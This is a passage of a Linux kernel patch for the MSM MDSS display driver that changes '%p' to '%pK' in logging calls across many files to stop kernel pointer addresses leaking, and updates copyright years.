- 		blit_op->src.roi.x, blit_op->src.roi.y, blit_op->src.roi.width,
-@@ -1299,14 +1300,15 @@ int config_ppp_op_mode(struct ppp_blit_op *blit_op)
-                 blit_op->src.p1, blit_op->src.stride1);
- 	if (blit_op->bg.p0 != blit_op->dst.p0)
- 		pr_debug("BLIT BG Param Fmt %d (x %d,y %d,w %d,h %d), ROI(x %d,y %d, w\
--			 %d, h %d) Addr %p, Stride S0 %d Addr_P1 %p, Stride S1 %d\n",
-+			 %d, h %d) Addr %pK, Stride S0 %d Addr_P1 %pK,\
-+			 Stride S1 %d\n",
- 			blit_op->bg.color_fmt, blit_op->bg.prop.x, blit_op->bg.prop.y,
- 			blit_op->bg.prop.width, blit_op->bg.prop.height,
- 			blit_op->bg.roi.x, blit_op->bg.roi.y, blit_op->bg.roi.width,
- 			blit_op->bg.roi.height, blit_op->bg.p0, blit_op->bg.stride0,
- 	                blit_op->bg.p1, blit_op->bg.stride1);
- 	pr_debug("BLIT FB Param Fmt %d (x %d,y %d,w %d,h %d), ROI(x %d,y %d, w\
--		 %d, h %d) Addr %p, Stride S0 %d Addr_P1 %p, Stride S1 %d\n",
-+		 %d, h %d) Addr %pK, Stride S0 %d Addr_P1 %pK, Stride S1 %d\n",
- 		blit_op->dst.color_fmt, blit_op->dst.prop.x, blit_op->dst.prop.y,
- 		blit_op->dst.prop.width, blit_op->dst.prop.height,
- 		blit_op->dst.roi.x, blit_op->dst.roi.y, blit_op->dst.roi.width,
-diff --git a/drivers/video/msm/mdss/mdss_debug.c b/drivers/video/msm/mdss/mdss_debug.c
-index 3513540..15d7dea 100644
---- a/drivers/video/msm/mdss/mdss_debug.c
-+++ b/drivers/video/msm/mdss/mdss_debug.c
-@@ -178,7 +178,7 @@ static ssize_t panel_debug_base_reg_write(struct file *file,
- 	for (i = 0; i < len; i++) {
- 		p = buf + i * 3;
- 		p[2] = 0;
--		pr_debug("p[%d] = %p:%s\n", i, p, p);
-+		pr_debug("p[%d] = %pK:%s\n", i, p, p);
- 		cnt = sscanf(p, "%x", &tmp);
- 		reg[i] = tmp;
- 		pr_debug("reg[%d] = %x\n", i, (int)reg[i]);
-@@ -1072,7 +1072,7 @@ void mdss_dump_reg(char __iomem *base, int len)
- 		x4 = readl_relaxed(addr+0x4);
- 		x8 = readl_relaxed(addr+0x8);
- 		xc = readl_relaxed(addr+0xc);
--		pr_info("%p : %08x %08x %08x %08x\n", addr, x0, x4, x8, xc);
-+		pr_info("%pK : %08x %08x %08x %08x\n", addr, x0, x4, x8, xc);
- 		addr += 16;
- 	}
- 	mdss_mdp_clk_ctrl(MDP_BLOCK_POWER_OFF);
-@@ -1192,7 +1192,7 @@ static inline struct mdss_mdp_misr_map *mdss_misr_get_map(u32 block_id,
- 		return NULL;
- 	}
- 
--	pr_debug("MISR Module(%d) CTRL(0x%x) SIG(0x%x) intf_base(0x%p)\n",
-+	pr_debug("MISR Module(%d) CTRL(0x%x) SIG(0x%x) intf_base(0x%pK)\n",
- 			block_id, map->ctrl_reg, map->value_reg, intf_base);
- 	return map;
- }
-@@ -1235,7 +1235,7 @@ int mdss_misr_set(struct mdss_data_type *mdata,
- 	bool use_mdp_up_misr = false;
- 
- 	if (!mdata || !req || !ctl) {
--		pr_err("Invalid input params: mdata = %p req = %p ctl = %p",
-+		pr_err("Invalid input params: mdata = %pK req = %pK ctl = %pK",
- 			mdata, req, ctl);
- 		return -EINVAL;
- 	}
-diff --git a/drivers/video/msm/mdss/mdss_dsi.c b/drivers/video/msm/mdss/mdss_dsi.c
-index 9d12dfb..62c6f12 100644
---- a/drivers/video/msm/mdss/mdss_dsi.c
-+++ b/drivers/video/msm/mdss/mdss_dsi.c
-@@ -471,7 +471,7 @@ static int mdss_dsi_off(struct mdss_panel_data *pdata, int power_state)
- 
- 	panel_info = &ctrl_pdata->panel_data.panel_info;
- 
--	pr_debug("%s+: ctrl=%p ndx=%d power_state=%d\n",
-+	pr_debug("%s+: ctrl=%pK ndx=%d power_state=%d\n",
- 		__func__, ctrl_pdata, ctrl_pdata->ndx, power_state);
- 
- 	if (power_state == panel_info->panel_power_state) {
-@@ -559,7 +559,7 @@ int mdss_dsi_on(struct mdss_panel_data *pdata)
- 				panel_data);
- 
- 	cur_power_state = pdata->panel_info.panel_power_state;
--	pr_debug("%s+: ctrl=%p ndx=%d cur_power_state=%d\n", __func__,
-+	pr_debug("%s+: ctrl=%pK ndx=%d cur_power_state=%d\n", __func__,
- 		ctrl_pdata, ctrl_pdata->ndx, cur_power_state);
- 
- 	pinfo = &pdata->panel_info;
-@@ -703,7 +703,7 @@ static int mdss_dsi_unblank(struct mdss_panel_data *pdata)
- 				panel_data);
- 	mipi  = &pdata->panel_info.mipi;
- 
--	pr_debug("%s+: ctrl=%p ndx=%d cur_blank_state=%d\n", __func__,
-+	pr_debug("%s+: ctrl=%pK ndx=%d cur_blank_state=%d\n", __func__,
- 		ctrl_pdata, ctrl_pdata->ndx, pdata->panel_info.blank_state);
- 
- 	mdss_dsi_clk_ctrl(ctrl_pdata, DSI_ALL_CLKS, 1);
-@@ -756,7 +756,7 @@ static int mdss_dsi_blank(struct mdss_panel_data *pdata, int power_state)
- 				panel_data);
- 	mipi = &pdata->panel_info.mipi;
- 
--	pr_debug("%s+: ctrl=%p ndx=%d power_state=%d\n",
-+	pr_debug("%s+: ctrl=%pK ndx=%d power_state=%d\n",
- 		__func__, ctrl_pdata, ctrl_pdata->ndx, power_state);
- 
- 	mdss_dsi_clk_ctrl(ctrl_pdata, DSI_ALL_CLKS, 1);
-@@ -826,7 +826,7 @@ static int mdss_dsi_post_panel_on(struct mdss_panel_data *pdata)
- 	ctrl_pdata = container_of(pdata, struct mdss_dsi_ctrl_pdata,
- 				panel_data);
- 
--	pr_debug("%s+: ctrl=%p ndx=%d\n", __func__,
-+	pr_debug("%s+: ctrl=%pK ndx=%d\n", __func__,
- 				ctrl_pdata, ctrl_pdata->ndx);
- 
- 	mdss_dsi_clk_ctrl(ctrl_pdata, DSI_ALL_CLKS, 1);
-@@ -858,7 +858,7 @@ int mdss_dsi_cont_splash_on(struct mdss_panel_data *pdata)
- 	ctrl_pdata = container_of(pdata, struct mdss_dsi_ctrl_pdata,
- 				panel_data);
- 
--	pr_debug("%s+: ctrl=%p ndx=%d\n", __func__,
-+	pr_debug("%s+: ctrl=%pK ndx=%d\n", __func__,
- 				ctrl_pdata, ctrl_pdata->ndx);
- 
- 	WARN((ctrl_pdata->ctrl_state & CTRL_STATE_PANEL_INIT),
-@@ -1700,7 +1700,7 @@ int mdss_dsi_retrieve_ctrl_resources(struct platform_device *pdev, int mode,
- 		return rc;
- 	}
- 
--	pr_info("%s: ctrl_base=%p ctrl_size=%x phy_base=%p phy_size=%x\n",
-+	pr_info("%s: ctrl_base=%pK ctrl_size=%x phy_base=%pK phy_size=%x\n",
- 		__func__, ctrl->ctrl_base, ctrl->reg_size, ctrl->phy_io.base,
- 		ctrl->phy_io.len);
- 
-diff --git a/drivers/video/msm/mdss/mdss_dsi_host.c b/drivers/video/msm/mdss/mdss_dsi_host.c
-index ace2895..762cb55 100644
---- a/drivers/video/msm/mdss/mdss_dsi_host.c
-+++ b/drivers/video/msm/mdss/mdss_dsi_host.c
-@@ -97,7 +97,7 @@ void mdss_dsi_ctrl_init(struct device *ctrl_dev,
- 	if (ctrl->mdss_util->register_irq(ctrl->dsi_hw))
- 		pr_err("%s: mdss_register_irq failed.\n", __func__);
- 
--	pr_debug("%s: ndx=%d base=%p\n", __func__, ctrl->ndx, ctrl->ctrl_base);
-+	pr_debug("%s: ndx=%d base=%pK\n", __func__, ctrl->ndx, ctrl->ctrl_base);
- 
- 	init_completion(&ctrl->dma_comp);
- 	init_completion(&ctrl->mdp_comp);
-diff --git a/drivers/video/msm/mdss/mdss_dsi_panel.c b/drivers/video/msm/mdss/mdss_dsi_panel.c
-index 8c57c9b..b168769 100644
---- a/drivers/video/msm/mdss/mdss_dsi_panel.c
-+++ b/drivers/video/msm/mdss/mdss_dsi_panel.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -611,7 +611,7 @@ static int mdss_dsi_panel_on(struct mdss_panel_data *pdata)
- 	ctrl = container_of(pdata, struct mdss_dsi_ctrl_pdata,
- 				panel_data);
- 
--	pr_debug("%s: ctrl=%p ndx=%d\n", __func__, ctrl, ctrl->ndx);
-+	pr_debug("%s: ctrl=%pK ndx=%d\n", __func__, ctrl, ctrl->ndx);
- 
- 	if (pinfo->dcs_cmd_by_left) {
- 		if (ctrl->ndx != DSI_CTRL_LEFT)
-@@ -641,7 +641,7 @@ static int mdss_dsi_post_panel_on(struct mdss_panel_data *pdata)
- 	ctrl = container_of(pdata, struct mdss_dsi_ctrl_pdata,
- 				panel_data);
- 
--	pr_debug("%s: ctrl=%p ndx=%d\n", __func__, ctrl, ctrl->ndx);
-+	pr_debug("%s: ctrl=%pK ndx=%d\n", __func__, ctrl, ctrl->ndx);
- 
- 	pinfo = &pdata->panel_info;
- 	if (pinfo->dcs_cmd_by_left) {
-@@ -651,7 +651,7 @@ static int mdss_dsi_post_panel_on(struct mdss_panel_data *pdata)
- 
- 	on_cmds = &ctrl->post_panel_on_cmds;
- 
--	pr_debug("%s: ctrl=%p cmd_cnt=%d\n", __func__, ctrl, on_cmds->cmd_cnt);
-+	pr_debug("%s: ctrl=%pK cmd_cnt=%d\n", __func__, ctrl, on_cmds->cmd_cnt);
- 
- 	if (on_cmds->cmd_cnt) {
- 		msleep(50);	/* wait for 3 vsync passed */
-@@ -677,7 +677,7 @@ static int mdss_dsi_panel_off(struct mdss_panel_data *pdata)
- 	ctrl = container_of(pdata, struct mdss_dsi_ctrl_pdata,
- 				panel_data);
- 
--	pr_debug("%s: ctrl=%p ndx=%d\n", __func__, ctrl, ctrl->ndx);
-+	pr_debug("%s: ctrl=%pK ndx=%d\n", __func__, ctrl, ctrl->ndx);
- 
- 	if (pinfo->dcs_cmd_by_left) {
- 		if (ctrl->ndx != DSI_CTRL_LEFT)
-@@ -708,7 +708,7 @@ static int mdss_dsi_panel_low_power_config(struct mdss_panel_data *pdata,
- 	ctrl = container_of(pdata, struct mdss_dsi_ctrl_pdata,
- 				panel_data);
- 
--	pr_debug("%s: ctrl=%p ndx=%d enable=%d\n", __func__, ctrl, ctrl->ndx,
-+	pr_debug("%s: ctrl=%pK ndx=%d enable=%d\n", __func__, ctrl, ctrl->ndx,
- 		enable);
- 
- 	/* Any panel specific low power commands/config */
-diff --git a/drivers/video/msm/mdss/mdss_fb.c b/drivers/video/msm/mdss/mdss_fb.c
-index c06abd3..6f09747 100644
---- a/drivers/video/msm/mdss/mdss_fb.c
-+++ b/drivers/video/msm/mdss/mdss_fb.c
-@@ -1642,7 +1642,7 @@ int mdss_fb_alloc_fb_ion_memory(struct msm_fb_data_type *mfd, size_t fb_size)
- 		goto fb_mmap_failed;
- 	}
- 
--	pr_debug("alloc 0x%zuB vaddr = %p (%pa iova) for fb%d\n", fb_size,
-+	pr_debug("alloc 0x%zuB vaddr = %pK (%pa iova) for fb%d\n", fb_size,
- 			vaddr, &mfd->iova, mfd->index);
- 
- 	mfd->fbi->screen_base = (char *) vaddr;
-@@ -1735,7 +1735,7 @@ static int mdss_fb_fbmem_ion_mmap(struct fb_info *info,
- 				vma->vm_page_prot =
- 					pgprot_writecombine(vma->vm_page_prot);
- 
--			pr_debug("vma=%p, addr=%x len=%ld\n",
-+			pr_debug("vma=%pK, addr=%x len=%ld\n",
- 					vma, (unsigned int)addr, len);
- 			pr_debug("vm_start=%x vm_end=%x vm_page_prot=%ld\n",
- 					(unsigned int)vma->vm_start,
-@@ -1905,7 +1905,7 @@ static int mdss_fb_alloc_fbmem_iommu(struct msm_fb_data_type *mfd, int dom)
- 	if (rc)
- 		pr_warn("Cannot map fb_mem %pa to IOMMU. rc=%d\n", &phys, rc);
- 
--	pr_debug("alloc 0x%zxB @ (%pa phys) (0x%p virt) (%pa iova) for fb%d\n",
-+	pr_debug("alloc 0x%zxB @ (%pa phys) (0x%pK virt) (%pa iova) for fb%d\n",
- 		 size, &phys, virt, &mfd->iova, mfd->index);
- 
- 	mfd->fbi->screen_base = virt;
-diff --git a/drivers/video/msm/mdss/mdss_hdmi_tx.c b/drivers/video/msm/mdss/mdss_hdmi_tx.c
-index 90f9267..140a460 100644
---- a/drivers/video/msm/mdss/mdss_hdmi_tx.c
-+++ b/drivers/video/msm/mdss/mdss_hdmi_tx.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2010-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2010-2014,2016 The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -1035,7 +1035,7 @@ static int hdmi_tx_sysfs_create(struct hdmi_tx_ctrl *hdmi_ctrl,
- 		return rc;
- 	}
- 	hdmi_ctrl->kobj = &fbi->dev->kobj;
--	DEV_DBG("%s: sysfs group %p\n", __func__, hdmi_ctrl->kobj);
-+	DEV_DBG("%s: sysfs group %pK\n", __func__, hdmi_ctrl->kobj);
- 
- 	return 0;
- } /* hdmi_tx_sysfs_create */
-@@ -3556,7 +3556,7 @@ static int hdmi_tx_init_resource(struct hdmi_tx_ctrl *hdmi_ctrl)
- 			DEV_DBG("%s: '%s' remap failed or not available\n",
- 				__func__, hdmi_tx_io_name(i));
- 		}
--		DEV_INFO("%s: '%s': start = 0x%p, len=0x%x\n", __func__,
-+		DEV_INFO("%s: '%s': start = 0x%pK, len=0x%x\n", __func__,
- 			hdmi_tx_io_name(i), pdata->io[i].base,
- 			pdata->io[i].len);
- 	}
-diff --git a/drivers/video/msm/mdss/mdss_hdmi_util.c b/drivers/video/msm/mdss/mdss_hdmi_util.c
-index b40ff28..b50aee3 100644
---- a/drivers/video/msm/mdss/mdss_hdmi_util.c
-+++ b/drivers/video/msm/mdss/mdss_hdmi_util.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2010-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2010-2014,2016 The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -178,7 +178,7 @@ static void hdmi_ddc_print_data(struct hdmi_tx_ddc_data *ddc_data,
- 		return;
- 	}
- 
--	DEV_DBG("%s: buf=%p, d_len=0x%x, d_addr=0x%x, no_align=%d\n",
-+	DEV_DBG("%s: buf=%pK, d_len=0x%x, d_addr=0x%x, no_align=%d\n",
- 		caller, ddc_data->data_buf, ddc_data->data_len,
- 		ddc_data->dev_addr, ddc_data->no_align);
- 	DEV_DBG("%s: offset=0x%x, req_len=0x%x, retry=%d, what=%s\n",
-diff --git a/drivers/video/msm/mdss/mdss_mdp.c b/drivers/video/msm/mdss/mdss_mdp.c
-index 14514f3..3a53359 100644
---- a/drivers/video/msm/mdss/mdss_mdp.c
-+++ b/drivers/video/msm/mdss/mdss_mdp.c
-@@ -1207,7 +1207,7 @@ static u32 mdss_mdp_res_init(struct mdss_data_type *mdata)
- 
- 	mdata->iclient = msm_ion_client_create(mdata->pdev->name);
- 	if (IS_ERR_OR_NULL(mdata->iclient)) {
--		pr_err("msm_ion_client_create() return error (%p)\n",
-+		pr_err("msm_ion_client_create() return error (%pK)\n",
- 				mdata->iclient);
- 		mdata->iclient = NULL;
- 	}
-@@ -1526,7 +1526,7 @@ static int mdss_mdp_probe(struct platform_device *pdev)
- 	if (rc)
- 		pr_debug("unable to map MDSS VBIF non-realtime base\n");
- 	else
--		pr_debug("MDSS VBIF NRT HW Base addr=%p len=0x%x\n",
-+		pr_debug("MDSS VBIF NRT HW Base addr=%pK len=0x%x\n",
- 			mdata->vbif_nrt_io.base, mdata->vbif_nrt_io.len);
- 
- 	res = platform_get_resource(pdev, IORESOURCE_IRQ, 0);
-diff --git a/drivers/video/msm/mdss/mdss_mdp_debug.c b/drivers/video/msm/mdss/mdss_mdp_debug.c
-index 39230d1..9b1ab8d 100644
---- a/drivers/video/msm/mdss/mdss_mdp_debug.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_debug.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2014, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2014,2016 The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -57,13 +57,13 @@ static void __dump_pipe(struct seq_file *s, struct mdss_mdp_pipe *pipe)
- 	seq_puts(s, "Data:\n");
- 	if (pipe->front_buf.num_planes) {
- 		buf = pipe->front_buf.p;
--		seq_printf(s, "\tfront_buf ihdl=0x%p addr=%pa size=%lu\n",
-+		seq_printf(s, "\tfront_buf ihdl=0x%pK addr=%pa size=%lu\n",
- 				buf->srcp_ihdl, &buf->addr, buf->len);
- 	}
- 
- 	if (pipe->back_buf.num_planes) {
- 		buf = pipe->back_buf.p;
--		seq_printf(s, "\tback_buf ihdl=0x%p addr=%pa size=%lu\n",
-+		seq_printf(s, "\tback_buf ihdl=0x%pK addr=%pa size=%lu\n",
- 				buf->srcp_ihdl, &buf->addr, buf->len);
- 	}
- }
-diff --git a/drivers/video/msm/mdss/mdss_mdp_intf_cmd.c b/drivers/video/msm/mdss/mdss_mdp_intf_cmd.c
-index 6f6fc91..b07b3c5 100644
---- a/drivers/video/msm/mdss/mdss_mdp_intf_cmd.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_intf_cmd.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -581,7 +581,7 @@ static int mdss_mdp_cmd_wait4pingpong(struct mdss_mdp_ctl *ctl, void *arg)
- 			ctx->rdptr_enabled, ctl->roi_bkup.w,
- 			ctl->roi_bkup.h);
- 
--	pr_debug("%s: intf_num=%d ctx=%p koff_cnt=%d\n", __func__,
-+	pr_debug("%s: intf_num=%d ctx=%pK koff_cnt=%d\n", __func__,
- 			ctl->intf_num, ctx, atomic_read(&ctx->koff_cnt));
- 
- 	rc = wait_event_timeout(ctx->pp_waitq,
-@@ -1164,7 +1164,7 @@ static int mdss_mdp_cmd_intfs_setup(struct mdss_mdp_ctl *ctl,
- 
- 	ctx->intf_stopped = 0;
- 
--	pr_debug("%s: ctx=%p num=%d mixer=%d\n", __func__,
-+	pr_debug("%s: ctx=%pK num=%d mixer=%d\n", __func__,
- 				ctx, ctx->pp_num, mixer->num);
- 	MDSS_XLOG(ctl->num, atomic_read(&ctx->koff_cnt), ctx->clk_enabled,
- 					ctx->rdptr_enabled);
-diff --git a/drivers/video/msm/mdss/mdss_mdp_intf_video.c b/drivers/video/msm/mdss/mdss_mdp_intf_video.c
-index 2bc8a1d..9ce6885 100644
---- a/drivers/video/msm/mdss/mdss_mdp_intf_video.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_intf_video.c
-@@ -116,7 +116,7 @@ int mdss_mdp_video_addr_setup(struct mdss_data_type *mdata,
- 
- 	for (i = 0; i < count; i++) {
- 		head[i].base = mdata->mdss_io.base + offsets[i];
--		pr_debug("adding Video Intf #%d offset=0x%x virt=%p\n", i,
-+		pr_debug("adding Video Intf #%d offset=0x%x virt=%pK\n", i,
- 				offsets[i], head[i].base);
- 		head[i].ref_cnt = 0;
- 		head[i].intf_num = i + MDSS_MDP_INTF0;
-@@ -442,7 +442,7 @@ static int mdss_mdp_video_intfs_stop(struct mdss_mdp_ctl *ctl,
- 			pr_err("Intf %d not in use\n", (inum + MDSS_MDP_INTF0));
- 			return -ENODEV;
- 		}
--		pr_debug("stop ctl=%d video Intf #%d base=%p", ctl->num,
-+		pr_debug("stop ctl=%d video Intf #%d base=%pK", ctl->num,
- 			ctx->intf_num, ctx->base);
- 	} else {
- 		pr_err("Invalid intf number: %d\n", (inum + MDSS_MDP_INTF0));
-@@ -1158,7 +1158,7 @@ static int mdss_mdp_video_intfs_setup(struct mdss_mdp_ctl *ctl,
- 				(inum + MDSS_MDP_INTF0));
- 			return -EBUSY;
- 		}
--		pr_debug("video Intf #%d base=%p", ctx->intf_num, ctx->base);
-+		pr_debug("video Intf #%d base=%pK", ctx->intf_num, ctx->base);
- 		ctx->ref_cnt++;
- 	} else {
- 		pr_err("Invalid intf number: %d\n", (inum + MDSS_MDP_INTF0));
-diff --git a/drivers/video/msm/mdss/mdss_mdp_pipe.c b/drivers/video/msm/mdss/mdss_mdp_pipe.c
-index b747670..d8d01af 100644
---- a/drivers/video/msm/mdss/mdss_mdp_pipe.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_pipe.c
-@@ -1739,7 +1739,7 @@ int mdss_mdp_pipe_queue_data(struct mdss_mdp_pipe *pipe,
- 	}
- 
- 	if (src_data == NULL) {
--		pr_debug("src_data=%p pipe num=%dx\n",
-+		pr_debug("src_data=%pK pipe num=%dx\n",
- 				src_data, pipe->num);
- 		goto update_nobuf;
- 	}
-diff --git a/drivers/video/msm/mdss/mdss_mdp_pp.c b/drivers/video/msm/mdss/mdss_mdp_pp.c
-index 3cfa926..5065bc8 100644
---- a/drivers/video/msm/mdss/mdss_mdp_pp.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_pp.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -2224,7 +2224,7 @@ static int pp_ad_calc_bl(struct msm_fb_data_type *mfd, int bl_in, int *bl_out,
- 		pr_debug("AD not supported on device.\n");
- 		return ret;
- 	} else if (ret || !ad) {
--		pr_err("Failed to get ad info: ret = %d, ad = 0x%p.\n",
-+		pr_err("Failed to get ad info: ret = %d, ad = 0x%pK.\n",
- 			ret, ad);
- 		return ret;
- 	}
-@@ -2240,7 +2240,7 @@ static int pp_ad_calc_bl(struct msm_fb_data_type *mfd, int bl_in, int *bl_out,
- 
- 	if (!ad->bl_mfd || !ad->bl_mfd->panel_info ||
- 		!ad->bl_att_lut) {
--		pr_err("Invalid ad info: bl_mfd = 0x%p, ad->bl_mfd->panel_info = 0x%p, bl_att_lut = 0x%p\n",
-+		pr_err("Invalid ad info: bl_mfd = 0x%pK, ad->bl_mfd->panel_info = 0x%pK, bl_att_lut = 0x%pK\n",
- 			ad->bl_mfd,
- 			(!ad->bl_mfd) ? NULL : ad->bl_mfd->panel_info,
- 			ad->bl_att_lut);
-@@ -3507,7 +3507,7 @@ static int pp_hist_enable(struct pp_hist_col_info *hist_info,
- 	spin_lock_irqsave(&hist_info->hist_lock, flag);
- 	if (hist_info->col_en) {
- 		spin_unlock_irqrestore(&hist_info->hist_lock, flag);
--		pr_info("%s Hist collection has already been enabled %p\n",
-+		pr_info("%s Hist collection has already been enabled %pK\n",
- 			__func__, hist_info->base);
- 		goto exit;
- 	}
-@@ -3644,7 +3644,7 @@ static int pp_hist_disable(struct pp_hist_col_info *hist_info)
- 	spin_lock_irqsave(&hist_info->hist_lock, flag);
- 	if (hist_info->col_en == false) {
- 		spin_unlock_irqrestore(&hist_info->hist_lock, flag);
--		pr_debug("Histogram already disabled (%p)\n", hist_info->base);
-+		pr_debug("Histogram already disabled (%pK)\n", hist_info->base);
- 		ret = -EINVAL;
- 		goto exit;
- 	}
-@@ -3758,7 +3758,7 @@ int mdss_mdp_hist_intr_req(struct mdss_intr *intr, u32 bits, bool en)
- 	unsigned long flag;
- 	int ret = 0;
- 	if (!intr) {
--		pr_err("NULL addr passed, %p\n", intr);
-+		pr_err("NULL addr passed, %pK\n", intr);
- 		return -EINVAL;
- 	}
- 
-@@ -4512,7 +4512,7 @@ static int pp_ad_invalidate_input(struct msm_fb_data_type *mfd)
- 
- 	ret = mdss_mdp_get_ad(mfd, &ad);
- 	if (ret || !ad) {
--		pr_err("Fail to get ad: ret = %d, ad = 0x%p\n", ret, ad);
-+		pr_err("Fail to get ad: ret = %d, ad = 0x%pK\n", ret, ad);
- 		return -EINVAL;
- 	}
- 	pr_debug("AD backlight level changed (%d), trigger update to AD\n",
-diff --git a/drivers/video/msm/mdss/mdss_mdp_util.c b/drivers/video/msm/mdss/mdss_mdp_util.c
-index c62acf3..926dfde 100644
---- a/drivers/video/msm/mdss/mdss_mdp_util.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_util.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -507,7 +507,7 @@ static int mdss_mdp_put_img(struct mdss_mdp_img_data *data)
- 		pr_debug("pmem buf=0x%pa\n", &data->addr);
- 		data->srcp_file = NULL;
- 	} else if (!IS_ERR_OR_NULL(data->srcp_ihdl)) {
--		pr_debug("ion hdl=%p buf=0x%pa\n", data->srcp_ihdl,
-+		pr_debug("ion hdl=%pK buf=0x%pa\n", data->srcp_ihdl,
- 							&data->addr);
- 		if (!iclient) {
- 			pr_err("invalid ion client\n");
-@@ -599,7 +599,7 @@ static int mdss_mdp_get_img(struct msmfb_data *img,
- 		data->addr += data->offset;
- 		data->len -= data->offset;
- 
--		pr_debug("mem=%d ihdl=%p buf=0x%pa len=0x%lu\n", img->memory_id,
-+		pr_debug("mem=%d ihdl=%pK buf=0x%pa len=0x%lu\n", img->memory_id,
- 			 data->srcp_ihdl, &data->addr, data->len);
- 	} else {
- 		mdss_mdp_put_img(data);
-@@ -653,7 +653,7 @@ static int mdss_mdp_map_buffer(struct mdss_mdp_img_data *data)
- 		data->addr += data->offset;
- 		data->len -= data->offset;
- 
--		pr_debug("ihdl=%p buf=0x%pa len=0x%lu\n",
-+		pr_debug("ihdl=%pK buf=0x%pa len=0x%lu\n",
- 			 data->srcp_ihdl, &data->addr, data->len);
- 	} else {
- 		mdss_mdp_put_img(data);
-diff --git a/drivers/video/msm/mdss/mdss_mdp_wb.c b/drivers/video/msm/mdss/mdss_mdp_wb.c
-index def90eb..da6587e 100644
---- a/drivers/video/msm/mdss/mdss_mdp_wb.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_wb.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -95,7 +95,7 @@ struct mdss_mdp_data *mdss_mdp_wb_debug_buffer(struct msm_fb_data_type *mfd)
- 		ihdl = ion_alloc(iclient, img_size, SZ_4K,
- 				 ION_HEAP(ION_SF_HEAP_ID), 0);
- 		if (IS_ERR_OR_NULL(ihdl)) {
--			pr_err("unable to alloc fbmem from ion (%p)\n", ihdl);
-+			pr_err("unable to alloc fbmem from ion (%pK)\n", ihdl);
- 			return NULL;
- 		}
- 
-@@ -122,7 +122,7 @@ struct mdss_mdp_data *mdss_mdp_wb_debug_buffer(struct msm_fb_data_type *mfd)
- 			img->len = img_size;
- 		}
- 
--		pr_debug("ihdl=%p virt=%p phys=0x%pa iova=0x%pa size=%u\n",
-+		pr_debug("ihdl=%pK virt=%pK phys=0x%pa iova=0x%pa size=%u\n",
- 			 ihdl, videomemory, &mdss_wb_mem, &img->addr, img_size);
- 	}
- 	return &mdss_wb_buffer;
-@@ -435,7 +435,7 @@ static struct mdss_mdp_wb_data *get_user_node(struct msm_fb_data_type *mfd,
- 		list_for_each_entry(node, &wb->register_queue, registered_entry)
- 			if ((node->buf_data.p[0].srcp_ihdl == ihdl) &&
- 				    (node->buf_info.offset == data->offset)) {
--				pr_debug("found fd=%d hdl=%p off=%x addr=%pa\n",
-+				pr_debug("found fd=%d hdl=%pK off=%x addr=%pa\n",
- 						data->memory_id, ihdl,
- 						data->offset,
- 						&node->buf_data.p[0].addr);
-@@ -501,7 +501,7 @@ static void mdss_mdp_wb_free_node(struct mdss_mdp_wb_data *node)
- 	if (node->user_alloc) {
- 		buf = &node->buf_data.p[0];
- 
--		pr_debug("free user mem_id=%d ihdl=%p, offset=%u addr=0x%pa\n",
-+		pr_debug("free user mem_id=%d ihdl=%pK, offset=%u addr=0x%pa\n",
- 				node->buf_info.memory_id,
- 				buf->srcp_ihdl,
- 				node->buf_info.offset,
-diff --git a/drivers/video/msm/mdss/mdss_util.c b/drivers/video/msm/mdss/mdss_util.c
-index 587db41..345b0927 100644
---- a/drivers/video/msm/mdss/mdss_util.c
-+++ b/drivers/video/msm/mdss/mdss_util.c
-@@ -1,5 +1,4 @@
--
--/* Copyright (c) 2007-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2007-2014,2016 The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -33,7 +32,7 @@ int mdss_register_irq(struct mdss_hw *hw)
- 	if (!mdss_irq_handlers[hw->hw_ndx])
- 		mdss_irq_handlers[hw->hw_ndx] = hw;
- 	else
--		pr_err("panel %d's irq at %p is already registered\n",
-+		pr_err("panel %d's irq at %pK is already registered\n",
- 			hw->hw_ndx, hw->irq_handler);
- 	spin_unlock_irqrestore(&mdss_lock, irq_flags);
- 
